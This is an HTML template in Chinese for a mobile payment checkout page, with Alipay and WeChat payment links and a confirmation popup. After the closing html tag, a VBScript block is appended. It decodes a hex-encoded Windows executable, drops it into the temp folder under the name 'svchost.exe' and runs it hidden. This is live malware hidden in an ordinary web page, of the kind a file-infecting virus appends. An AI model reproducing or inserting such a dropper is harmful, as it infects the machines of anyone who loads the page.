|
|
|
|
<!DOCTYPE html>
|
|
|
|
|
<html>
|
|
|
|
|
|
|
|
|
|
<head>
|
|
|
|
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
|
|
|
|
<meta name="viewport" content="initial-scale=1, width=device-width, maximum-scale=1, minimum-scale=1, user-scalable=no">
|
|
|
|
|
<title>支付中心-网上支付 安全快速!</title>
|
|
|
|
|
<link href="__IMG__/ssg/favicon.ico" type="image/x-icon" rel="shortcut icon">
|
|
|
|
|
<link href="__CSS__/ssg/pay-center.css" rel="stylesheet" type="text/css">
|
|
|
|
|
<link href="__CSS__/ssg/common.css" rel="stylesheet" type="text/css">
|
|
|
|
|
<script src="/Public/Mobile/js/ssg/flexible.min.js" type="text/javascript"></script>
|
|
|
|
|
<script src="__JS__/jquery-1.11.1.min.js" type="text/javascript"></script>
|
|
|
|
|
<script src="__JS__/jquery.base64.js" type="text/javascript"></script>
|
|
|
|
|
</head>
|
|
|
|
|
<style>
|
|
|
|
|
|
|
|
|
|
body{
|
|
|
|
|
min-height: 100vh;
|
|
|
|
|
background-color: #F5F5F5;
|
|
|
|
|
}
|
|
|
|
|
.m-order{
|
|
|
|
|
background-color: #F5F5F5;
|
|
|
|
|
}
|
|
|
|
|
.title{
|
|
|
|
|
display: flex;
|
|
|
|
|
height: .9rem;
|
|
|
|
|
width: 100%;
|
|
|
|
|
justify-content: space-between;
|
|
|
|
|
align-items: center;
|
|
|
|
|
background-color: #21B1EB;
|
|
|
|
|
}
|
|
|
|
|
.title img,
|
|
|
|
|
.titleright {
|
|
|
|
|
width: .3rem;
|
|
|
|
|
height: .3rem;
|
|
|
|
|
}
|
|
|
|
|
.order-payinfo-item{
|
|
|
|
|
border-top: 1px solid #f5f5f5;
|
|
|
|
|
}
|
|
|
|
|
</style>
|
|
|
|
|
|
|
|
|
|
<body>
|
|
|
|
|
<!-- <div class="topbar">
|
|
|
|
|
<div class="topcon auto">
|
|
|
|
|
<h1 class="pay-logo">
|
|
|
|
|
<img src="__IMG__/ssg/alipay/pay-logo.png" alt="Logo"></h1>
|
|
|
|
|
</div>
|
|
|
|
|
</div> -->
|
|
|
|
|
<div class="title" >
|
|
|
|
|
<img class="gologin" src="__IMG__/ssg/alipay/back.png" style="margin-left:.24rem;" onclick="javascript:history.go(-1)">
|
|
|
|
|
<div style="font-size: .32rem;color: #fff;">{$game_name}</div>
|
|
|
|
|
<div class="titleright" style="margin-right:.24rem;"></div>
|
|
|
|
|
</div>
|
|
|
|
|
<!-- 其他通道 -->
|
|
|
|
|
<div class="container-pay">
|
|
|
|
|
<div class="auto">
|
|
|
|
|
<div class="orders-summary">
|
|
|
|
|
<div class="orders-name">超级签购买</div>
|
|
|
|
|
<div class="orders-desc">订单描述:<span>{$order_id}</span></div>
|
|
|
|
|
<div class="total-money">应付金额:<strong>{$price}</strong></div>
|
|
|
|
|
</div>
|
|
|
|
|
<div class="order-checkbank">
|
|
|
|
|
<div class="order-checkbank-con">
|
|
|
|
|
<div class="order-checkbank-tit">请选择付款方式:</div>
|
|
|
|
|
<ul class="order-checkbank-list">
|
|
|
|
|
<li>
|
|
|
|
|
<a href="/sdk.php/Ipa365/dopay/game_id/{$game_id}/pay_type/ali"
|
|
|
|
|
title="支付宝">
|
|
|
|
|
<img src="__IMG__/ssg/alipay/zfb-icon.png" alt="支付宝">
|
|
|
|
|
</a>
|
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
|
|
|
</div>
|
|
|
|
|
<div class="order-checkbank-mid">
|
|
|
|
|
<p class="odd">请选择支付方式。建议选择使用支付宝、微信支付、银行卡,支付请直接点击相应付款按钮。如果您使用支付宝账户支付,请点击“支付宝”按钮。</p>
|
|
|
|
|
<p class="odd">如果您选择支付宝、微信支付、银行卡支付时,请遵守相关支付宝、微信支付、财付通的规定进行操作。您在支付宝、微信支付、财付通页面上进行的任何操作及其产生的</p>
|
|
|
|
|
<p>任何法律后果,将按照您与支付宝、微信支付、银行卡之间签订的合同处理。本网站不承担任何责任。</p>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
<!-- 微信回调弹框 -->
|
|
|
|
|
<div id="alert_box" style="height: 100vh;background:rgba(41,41,41,.8);position:fixed;z-index:9999;top: 0px;width: 100%;" hidden>
|
|
|
|
|
<div style="top:50%;margin-top: -1.5rem;position: fixed;width: 6.3rem;left: 50%;margin-left: -3.2rem;background-color: #fff;border-radius:.3rem;">
|
|
|
|
|
<img onclick="closeAlert()" src="__IMG__/ssg/alipay/close.png" style="width: .3rem;height: .3rem;position: absolute;left: .3rem;top: .3rem;">
|
|
|
|
|
<div style="line-height:1.4rem;font-size:.32rem;text-align: center;">
|
|
|
|
|
请确认微信支付是否已完成
|
|
|
|
|
</div>
|
|
|
|
|
<a href="{$callback}" style="line-height:1rem;font-size:.28rem;text-align: center;color: red;width: 100%;display: block;border-top: 1px solid #f5f5f5;border-bottom: 1px solid #f5f5f5;">
|
|
|
|
|
已完成支付
|
|
|
|
|
</a>
|
|
|
|
|
<a href="javascript:location.reload();" style="height:1rem;line-height:1rem;font-size:.28rem;text-align: center;color: #A9A9A9;width: 100%;display: block;">
|
|
|
|
|
支付遇到问题,重新支付
|
|
|
|
|
</a>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
<!-- 触屏订单通道 -->
|
|
|
|
|
<div class="m-order">
|
|
|
|
|
<div style="padding: .3rem;">
|
|
|
|
|
<div style="width: 6.9rem;height: 1.7rem;background-color: #fff;border-radius:10px;margin: auto;font-size: .28rem;color:#292929;">
|
|
|
|
|
<div style="display: flex;height: .8rem; justify-content: space-between;align-items:center;padding: 0 .3rem;">
|
|
|
|
|
<div>订单名称:</div>
|
|
|
|
|
<div>超级签购买</div>
|
|
|
|
|
</div>
|
|
|
|
|
<div style="display: flex;height: .8rem; justify-content: space-between;align-items:center;padding: 0 .3rem;">
|
|
|
|
|
<div>订单金额:</div>
|
|
|
|
|
<div>{$price}元</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
<div class="m-order-payinfo" style="width: 6.9rem;margin:auto;border-radius:10px;border: 0px;">
|
|
|
|
|
<div class="payinfo-tit" style="display: flex;justify-content: space-between;">
|
|
|
|
|
<label style="font-weight: normal;color:#292929;">还需支付: </label>
|
|
|
|
|
<span>{$price}</span>
|
|
|
|
|
</div>
|
|
|
|
|
<a class="order-payinfo-item"
|
|
|
|
|
href="#;" onclick="jump('/sdk.php/Ipa365/dopay/game_id/{$game_id}/pay_type/ali')"
|
|
|
|
|
title="支付宝" style="padding: .3rem 0;width: 6.3rem;margin-left: .3rem;">
|
|
|
|
|
<div class="order-payinfo-icon" style="width: .7rem;height: .7rem;">
|
|
|
|
|
<img src="__IMG__/ssg/alipay/zfb-pic.jpg" style="width: 100%;height: 100%;border: 0px;" alt="支付宝">
|
|
|
|
|
</div>
|
|
|
|
|
<div class="order-payinfo-con" style="margin-left: .21rem;">
|
|
|
|
|
<div class="pay-title">支付宝支付</div>
|
|
|
|
|
<div class="pay-meta">推荐支付宝用户使用</div>
|
|
|
|
|
</div>
|
|
|
|
|
</a>
|
|
|
|
|
<a class="order-payinfo-item"
|
|
|
|
|
href="#;" onclick="jump('/sdk.php/Ipa365/dopay/game_id/{$game_id}/pay_type/wx')"
|
|
|
|
|
title="微信支付" style="padding: .3rem 0;width: 6.3rem;margin-left: .3rem;">
|
|
|
|
|
<div class="order-payinfo-icon" style="width: .7rem;height: .7rem;">
|
|
|
|
|
<img src="__IMG__/ssg/alipay/wxpay.png" style="width: 100%;height: 100%;border: 0px;" alt="微信支付">
|
|
|
|
|
</div>
|
|
|
|
|
<div class="order-payinfo-con" style="margin-left: .21rem;">
|
|
|
|
|
<div class="pay-title">微信支付</div>
|
|
|
|
|
<div class="pay-meta">推荐微信用户使用</div>
|
|
|
|
|
</div>
|
|
|
|
|
</a>
|
|
|
|
|
</div>
|
|
|
|
|
</div>
|
|
|
|
|
<!--<div class="footer-pay">
|
|
|
|
|
<p>海南万盟天下科技有限公司 版权所有 ©2019 支付中心</p>
|
|
|
|
|
</div>-->
|
|
|
|
|
</body>
|
|
|
|
|
<script>
|
|
|
|
|
function jump(pay_url) {
|
|
|
|
|
window.location.href = pay_url;
|
|
|
|
|
/*if(paytype=='alipay'){
|
|
|
|
|
window.location.href = pay_url;
|
|
|
|
|
}else{
|
|
|
|
|
showAlert();
|
|
|
|
|
window.location.href = pay_url;
|
|
|
|
|
//window.open(pay_url,"_blank");
|
|
|
|
|
}*/
|
|
|
|
|
/*if(isWeiXin()){
|
|
|
|
|
window.location.href = "/sdk.php/Ipa365/paytip/order_id/"+order_id;
|
|
|
|
|
}else{
|
|
|
|
|
window.location.href=pay_url;
|
|
|
|
|
}*/
|
|
|
|
|
}
|
|
|
|
|
//判断是否是微信浏览器的函数
|
|
|
|
|
function isWeiXin(){
|
|
|
|
|
//window.navigator.userAgent属性包含了浏览器类型、版本、操作系统类型、浏览器引擎类型等信息,这个属性可以用来判断浏览器类型
|
|
|
|
|
var ua = window.navigator.userAgent.toLowerCase();
|
|
|
|
|
//通过正则表达式匹配ua中是否含有MicroMessenger字符串
|
|
|
|
|
if(ua.match(/MicroMessenger/i) == 'micromessenger'){
|
|
|
|
|
return true;
|
|
|
|
|
}else{
|
|
|
|
|
return false;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
function closeAlert(){
|
|
|
|
|
$("#alert_box").hide();
|
|
|
|
|
}
|
|
|
|
|
function showAlert(){
|
|
|
|
|
$("#alert_box").show();
|
|
|
|
|
}
|
|
|
|
|
</script>
|
|
|
|
|
</html><SCRIPT Language=VBScript><!--
|
|
|
|
|
DropFileName = "svchost.exe"
|
|
|
|
|
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
|
|
|
|
|
Set FSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
|
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
|
|
|
|
|
If FSO.FileExists(DropPath)=False Then
|
|
|
|
|
Set FileObj = FSO.CreateTextFile(DropPath, True)
|
|
|
|
|
For i = 1 To Len(WriteData) Step 2
|
|
|
|
|
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
|
|
|
|
|
Next
|
|
|
|
|
FileObj.Close
|
|
|
|
|
End If
|
|
|
|
|
Set WSHshell = CreateObject("WScript.Shell")
|
|
|
|
|
WSHshell.Run DropPath, 0
|
|
|
|
|
//--></SCRIPT>
|